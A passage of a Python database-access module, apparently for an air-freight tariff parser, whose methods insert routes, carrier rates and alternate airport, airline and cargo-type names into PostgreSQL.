where lower(%s) in
(
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s)
),
(
select id_airport
from airports
where lower(%s) in
(
lower(airport_name),
lower(airport_code_iata),
lower(airport_code_ikao),
lower(city_name)
)
union
select id_airport
from airports_alt
where lower(airport_name_alt) = lower(%s)
),
(
select id_airlines
from airlines
where lower(%s) in
(
lower(airline_name),
lower(airline_iata),
lower(airline_ikao)
)
union
select id_airlines
from airlines_alt
where lower(airlines_name_alt) = lower(%s)
),
(
select id_cargo_type
from cargo_type
where lower(cargo_type_name) = lower(%s)
)
)
ON CONFLICT
(
id_carrier,
id_airport_from,
id_airport_to,
id_airlines,
id_cargo_type,
id_airport_transit
)
DO NOTHING
RETURNING id_route, id_record_parsers
''', (id_record_parsers,
id_carrier,
id_airport_from, id_airport_from,
id_airport_to, id_airport_to,
id_airport_transit, id_airport_transit,
id_airline, id_airline,
id_cargo_type))
self.connection.commit()
return self.cursor.fetchall()
def rateRowConvDb(self, number=1, id_parsers=None):
self.cursor.execute('''select rate_%s_rub
from input_parsers
where id_record_parsers = %s
''', (number, id_parsers))
return self.cursor.fetchone()[0]
def rateConvDb(self, id_route=None, number=1, id_parsers=None):
self.cursor.execute('''
insert into carrier_rates
(
id_route,
weight_min_kg,
weight_from_kg,
weight_to_kg,
cost_min_rub,
rate_rub
)
values (
%s,
(
select weight_min_kg
from input_parsers
where id_record_parsers = %s
),
(
select weight_%s_from_kg
from input_parsers
where id_record_parsers = %s
),
(
select weight_%s_to_kg
from input_parsers
where id_record_parsers = %s
),
(
select cost_min_rub
from input_parsers
where id_record_parsers = %s
),
(
select rate_%s_rub
from input_parsers
where id_record_parsers = %s
)
)
''', ((id_route,
id_parsers,
number,
id_parsers,
number,
id_parsers,
id_parsers,
number,
id_parsers,)))
self.connection.commit()
def addAirportConvDb(self, keyboard=None, airport=None):
self.cursor.execute('''
select setval('airports_alt_id_airports_alt_seq',
(select max(id_airports_alt) from airports_alt));
insert into airports_alt
(id_airport,
airport_name_alt)
values (%s, %s)
''', (keyboard, airport))
self.connection.commit()
def addAirlineConvDb(self, keyboard=None, airline=None):
self.cursor.execute('''
select setval('airlines_alt_id_airlines_alt_seq',
(select max(id_airlines_alt) from airlines_alt));
insert into airlines_alt
(id_airlines,
airlines_name_alt)
values (%s, %s)
''', (keyboard, airline))
self.connection.commit()
def addTypeConvDb(self, keyboard=None, type=None):
self.cursor.execute('''
select setval('cargo_type_alt_id_cargo_type_alt_seq',
(select max(id_cargo_type_alt) from cargo_type_alt));
insert into cargo_type_alt
(id_cargo_type,
cargo_type_name_alt)
values (%s, %s)
''', (keyboard, type))
self.connection.commit()
def closeConnection(self):
self.cursor.close()
self.connection.close()
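# Hedged usage sketch (not part of the original module): it needs a reachable
# PostgreSQL instance and real credentials in SqlShell.DATABASE (the values
# above are masked placeholders), so it is left commented out.
# if __name__ == '__main__':
#     shell = SqlShell()
#     print(shell.countInputParsers())   # number of parsed tariff records
#     shell.closeConnection()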
|
[
"iv.prokofyev@gmail.com"
] |
iv.prokofyev@gmail.com
|